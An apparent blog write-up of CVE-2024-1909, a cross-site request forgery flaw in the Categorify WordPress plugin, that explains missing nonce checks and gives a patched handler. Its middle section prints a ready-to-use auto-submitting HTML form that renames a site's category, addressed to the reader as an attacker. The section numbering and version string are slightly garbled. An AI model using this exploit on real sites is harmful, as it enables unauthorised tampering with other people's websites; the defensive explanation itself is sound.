CVE-2024-1909 - Cross-Site Request Forgery in Categorify WordPress Plugin – Exploit Analysis and Example

CVE-2024-1909 affects the Categorify plugin for WordPress, putting sites at risk by allowing attackers to rename categories without authentication. All versions up to and including 1..7.4 are vulnerable due to missing or incorrect nonce validation in the categorifyAjaxRenameCategory function.

1. Understanding the Vulnerability

The Categorify plugin adds category management features to WordPress sites. Its AJAX handlers, especially categorifyAjaxRenameCategory, let users rename categories via the admin interface.

But, in every version up through 1..7.4, this function lacks proper WordPress nonce verification. Nonces are special tokens WordPress uses to check if a request is coming from a legitimate source (like a real admin) and not a forgery.

What is Cross-Site Request Forgery (CSRF)?

CSRF tricks a logged-in user (here, an administrator) to perform actions on behalf of an attacker. If an attacker gets an admin to click a malicious link or visit a site that loads a crafted request, the site will process the request with the admin's permissions.

A typical secure AJAX handler in WordPress should verify the request like this

function myplugin_ajax_function() {
    check_ajax_referer('myplugin_action_nonce');
    // Continue processing...
}

But Categorify's code (simplified for clarity) *misses this check*

add_action('wp_ajax_categorify_rename_category', 'categorifyAjaxRenameCategory');

function categorifyAjaxRenameCategory() {
    // No check_ajax_referer() here!
    $category_id = intval($_POST['category_id']);
    $new_name = sanitize_text_field($_POST['new_name']);
    wp_update_term($category_id, 'category', ['name' => $new_name]);
    wp_send_json_success();
}

> No nonce verification means anyone can submit this form, as long as the administrator is logged in.

3. Exploit Example

If you’re an attacker, you can craft the following HTML and trick an admin into opening it (via email, forum post, etc.):

<!-- Exploit: CSRF to Rename a Category to "Hacked by Attacker!" -->
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=categorify_rename_category"; method="POST" id="csrf">
      <input type="hidden" name="category_id" value="1">
      <input type="hidden" name="new_name" value="Hacked by Attacker!">
    </form>
    <script>
      document.getElementById('csrf').submit();
    </script>
  </body>
</html>

Why does this work?

Because there’s no nonce check or origin validation, any site can send this request, as long as the victim is logged in as an admin.

Patch or Uninstall Immediately!

- Update Categorify if/when a patched version is available (WordPress plugin page)

*Developers*: Always use check_admin_referer() or check_ajax_referer() in AJAX handlers

function categorifyAjaxRenameCategory() {
    check_ajax_referer('categorify_nonce');
    // process...
}

Learn more at WordPress Nonces Documentation.

6. References

- CVE-2024-1909 at WPVulnDB
- Categorify plugin at WordPress.org
- OWASP CSRF Explanation
- Wordfence Advisory on Categorify

7. Conclusion

CVE-2024-1909 is a classic example of why security checks must not be skipped in plugin development. If you use Categorify, you could be at risk unless you patch or remove it.

Stay safe: Always keep plugins updated, and ensure developer best practices are followed on your WordPress installations.


*(This post is for educational and defensive purposes ONLY. Do not use this knowledge to attack websites you do not own or have explicit permission to test.)*

Timeline

Published on: 02/27/2024 11:15:09 UTC
Last modified on: 02/27/2024 14:19:41 UTC